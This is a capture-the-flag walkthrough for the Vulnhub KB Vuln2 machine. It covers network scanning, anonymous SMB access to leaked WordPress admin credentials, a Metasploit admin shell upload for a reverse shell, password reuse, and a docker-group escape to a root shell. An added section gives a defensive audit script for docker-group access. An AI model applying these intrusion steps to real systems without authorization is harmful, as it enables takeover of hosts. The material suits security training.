KB Vuln2 Vulnhub Walkthrough

Today we share another Vulnhub machine walkthrough, this one named KB Vuln2. This is another boot-to-root challenge, and the difficulty of the VM is easy. You can download the machine here.

Network Scanning

Let’s start off by scanning the network and identifying the host IP address within the same network. Run the netdiscover command.

sudo netdiscover

So it looks like is our target IP. The next step is to scan the target with Nmap to check for open ports and probe the services running on the VM. Run the following command.

nmap -sV

The Nmap scan output shows the target machine's open ports: 21/FTP, 22/SSH, 80/HTTP (Apache server), and 139/445 SMB (Samba server).

SMB Reconnaissance

SMBMap allows users to enumerate Samba share drives across an entire domain. It lists share drives and drive permissions. Let's discover all drives and users. Run the following command.

The output shows that the target machine allows anonymous user login. Let's connect to the drive using the smbclient tool. We run the dir command to list all directories and files, and we find something useful: a file, which we download to our local machine.

smbmap -H
smbclient //

After downloading the file, we extract the backup and find an admin credential and a WordPress setup directory.

cat remember_me.txt

We navigate to the /wordpress/admin directory, try to log in as the admin user, and successfully log in with administrator rights.

Let's get a reverse shell. Without wasting time, we run msfconsole, load the wp_admin_shell_upload exploit, and set the targeturi and the admin username and password.

sudo msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts
set targeturi /wordpress
set username admin
set password ......
set lport 445
python -c 'import pty;pty.spawn("/bin/bash")'

Now we have a proper bash shell on the target machine. Let's enumerate the host's users and groups and check sudo permissions for the www-data user. Nothing useful turns up, so we try the same WordPress password to log in as the kbadmin user.

su kbadmin

Privilege Escalation

Again we check SUID permissions, users, and groups, and we find something useful: the kbadmin user is a member of the docker group. This means we can run docker without any superuser privilege.

We run the docker images command to check for available images, but Docker currently has none. Let's run the docker privilege escalation command.

  • -it => interactive mode (with a TTY)
  • -v => volume (bind mount) option
  • / => host directory to mount
  • :/mnt => mount point inside the container

docker images
docker run -it -v /:/mnt ubuntu

As we already saw, Docker currently has no images, so after we run the privilege escalation command, Docker pulls the Ubuntu image, which takes some time.

After the Pull complete message, our Docker container starts automatically and we get a root shell in the Ubuntu container. To read the root flag, let's move to the /mnt/root directory and read it.

cd /mnt
cd root
cat flag.txt
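
The escalation above works because docker group membership lets a user start a container with the host's / mounted, which is root-equivalent access. As a defensive check, the following added example (not part of the original walkthrough) lists non-root accounts with docker group access and flags a world-writable daemon socket. The function names, the `ci` account and the sample group/passwd lines are constructed for illustration, and `/var/run/docker.sock` is assumed to be the default socket path.

```shell
#!/bin/sh
# Added example, not from the walkthrough: find accounts that can drive the
# Docker daemon without sudo (docker group membership is root-equivalent).

# docker_capable_users GROUP_FILE PASSWD_FILE [GROUP]: print non-root users with
# GROUP (default: docker) as supplementary group (group file) or primary group (passwd file).
docker_capable_users() {
    awk -F: -v g="${3:-docker}" '
        FILENAME == ARGV[1] {                  # group(5) records
            if ($1 == g) {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) if (m[i] != "") seen[m[i]] = 1
            }
            next
        }
        gid != "" && $4 == gid { seen[$1] = 1 }    # passwd(5) records
        END { for (u in seen) if (u != "root") print u }
    ' "$1" "$2" | sort
}

# socket_world_writable MODE: MODE is the octal string from
# stat -c '%a' /var/run/docker.sock; succeeds when "others" can write to it.
socket_world_writable() {
    case "${1#"${1%?}"}" in                    # last digit = "others" bits
        2|3|6|7) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed sample data modelled on the accounts named in the walkthrough.
sample_audit() {
    d=$(mktemp -d) || return 1
    printf '%s\n' 'root:x:0:' 'www-data:x:33:' 'docker:x:998:kbadmin,root' > "$d/group"
    printf '%s\n' 'root:x:0:0::/root:/bin/bash' 'www-data:x:33:33::/var/www:/bin/sh' \
        'kbadmin:x:1000:1000::/home/kbadmin:/bin/bash' 'ci:x:1001:998::/home/ci:/bin/sh' > "$d/passwd"
    docker_capable_users "$d/group" "$d/passwd"
    rm -rf "$d"
}

if [ "${1:-}" = "--audit" ]; then              # live host check
    docker_capable_users /etc/group /etc/passwd
    s=/var/run/docker.sock
    if [ -S "$s" ] && socket_world_writable "$(stat -c '%a' "$s")"; then
        echo "WARNING: $s is world-writable"
    fi
else
    sample_audit                               # prints ci and kbadmin, one per line
fi
```

Every account this reports should be treated as having root on the host; the `ci` entry shows why primary-group membership has to be checked as well as the member list in the group file.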

By Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
